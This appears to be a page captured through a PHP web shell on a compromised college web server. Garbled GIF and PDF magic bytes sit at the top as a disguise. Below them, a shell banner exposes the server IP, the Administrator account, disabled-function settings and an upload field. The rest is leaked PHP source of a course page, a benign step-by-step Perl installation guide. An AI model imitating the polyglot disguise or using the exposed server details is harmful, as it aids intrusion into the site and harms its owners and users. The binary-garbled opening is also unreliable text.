GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /nginx/html/JimMartinson/Setup/Perl/ |
Upload File : |
<? // JimMartinson/Setup/Perl/index.php $TRACK = "<b>".basename(__FILE__).'</b> <span class="pv_fl">('.__FILE__.")</span>\n<ol>\n"; ini_set('include_path',ini_get('include_path').PATH_SEPARATOR.$_SERVER['DOCUMENT_ROOT']."/"); // Add the DOCUMENT_ROOT to the include_path. include('application.phpinc'); $title = "Perl Installation Guide"; $headTitle = '_CST_ - '.$title; $pageTitle = '_CST_<br>'.$title; //$pageMenu= 'JimMartinson/Setup/PHP/PHPMenu.phpinc'; include('common/pageHeader.phpinc'); ?> <? $dataFolder = formValue('dataFolder',''); $courseNumber = formValue('courseNumber',''); if ($courseNumber == '') $courseNumber = 'CSTxxxx'; if ($courseNumber != 'CSTxxxx') { $courseNumberComment = ''; } else { $courseNumberComment = ' where <b>CSTxxxx</b> is the number of the course you are taking'; } $courseTitle = formValue('courseTitle',''); $_SESSION['courseNumber'] = $courseNumber; $sectionTitle = $title; include('common/sectionHeader.phpinc'); ?> MySQL installation consists of two steps: <ol> <li> <!-- 1 --> Click on the <a href="download/ActivePerl-5.12.4.1205-MSWin32-x64-294981.msi">ActivePerl-5.12.4.1205-MSWin32-x64-294981.msi</a> or <a href="download/ActivePerl-5.12.4.1205-MSWin32-x86-294981.msi">ActivePerl-5.12.4.1205-MSWin32-x86-294981.msi</a> Installer link and select <b><u>S</u>ave</b> if using Internet Explorer (IE) or <b>Save File</b> if using Firefox (FF). <br> <img src="../Save_IE.jpg" width="404" height="269" alt="IE save" /> <img src="../Save_Firefox.jpg" width="439" height="187" alt="Firefox save" /> <li><!-- 2 --> Select the <b><?=$_SESSION['userDefaultDrive']?>:\<?=$courseNumber?>\Install</b> directory you created and click <b>Save</b>. <br> <img src="02_CST1615_Install.jpg" width="507" height="397" alt="CST1615\Install folder" /> <li><!-- 3 --> Open the <b><?=$_SESSION['userDefaultDrive']?>:\<?=$courseNumber?>\Install</b> directory and double-click on the Perl 5.10 installer (<b>ActivePerl-5.10.0.1004-MSWin32-x86-287188.msi</b>) to begin the installation. <br> <a href="../Vista/?installer=<?=$_SESSION['userDefaultDrive']?>:\<?=$courseNumber?>\Install\ActivePerl-5.10.0.1004-MSWin32-x86-287188.msi" target="_blank"><img src="../vista.png" alt="Vista" style=" vertical-align:text-bottom;" /><span class="bold error">Windows Vista, 7, and 8 alert:</span></a> The process for installing or uninstalling software in Vista and Windows 7 is different. <br> <img src="03_Perl_Installer.jpg" width="507" height="397" alt="Perl installer" /> </li> <li><!-- 4 --> Click <b>Run</b>. <br> <img src="04_Run.jpg" width="414" height="310" alt="Click Run" /> </li> <li><!-- 5 --> Click <b>Next</b>. <br> <img src="05_Next.jpg" width="499" height="388" alt="Click Next" /> </li> <li><!-- 6 --> Accept the license agreement and click <b>Next</b>. <br> <img src="06_Accept_Next.jpg" width="499" height="388" alt="Accept the license agreement and click next" /> </li> <li><!-- 7 --> Click <b>Next</b>. <br> <img src="07_Next.jpg" width="499" height="388" alt="Click next" /> </li> <li><!-- 8 --> Click <b>Next</b>. <br> <img src="08_Next.jpg" width="499" height="388" alt="Click next" /> </li> <li><!-- 9 --> Click <b>Install</b>. <br> <img src="09_Install.jpg" width="499" height="388" alt="Click install" /> </li> <li><!-- 10 --> You will now see the install window. This will take a few minutes to complete. <br> <img src="10_Installing.jpg" width="499" height="388" alt="Perl is installing" /> <br> When Perl is done installing click <b>Finish</b>. <br> <img src="10_Finish.jpg" width="499" height="388" alt="Click finish" /> </li> <li><!-- 11 --> Now it is time to test the installation. <br> Click on the start button <img src="../Vista/Vista_start_button.png" width="30" height="29" alt="Start button" />. <br> Type <b>cmd</b> and hit enter. <br> <img src="11_cmd.jpg" width="491" height="476" alt="cmd" /> </li> <li> From the command window type in the following three lines: <br> <pre class="kbd">perl print "test"; ^Z </pre> The ^Z above is a Ctrl-Z (Hold down the control (Ctrl) key and hit Z). <br> You should see the word <span class="kbd">test</span> printed to the window. <br> <img src="12_test.jpg" width="499" height="383" alt="Test Perl" /> <br> You can type <span class="kbd">exit</span> and hit Enter to close the window. </li> </ol> <p> <br> If you have completed the installation and configuration steps you can <a href="javascript:window.open('','_parent','');window.close();" onclick="window.open('','_parent','');window.close();return false;">close</a> this window. </p> <? include('common/sectionFooter.phpinc'); include('common/pageFooter.phpinc'); ?>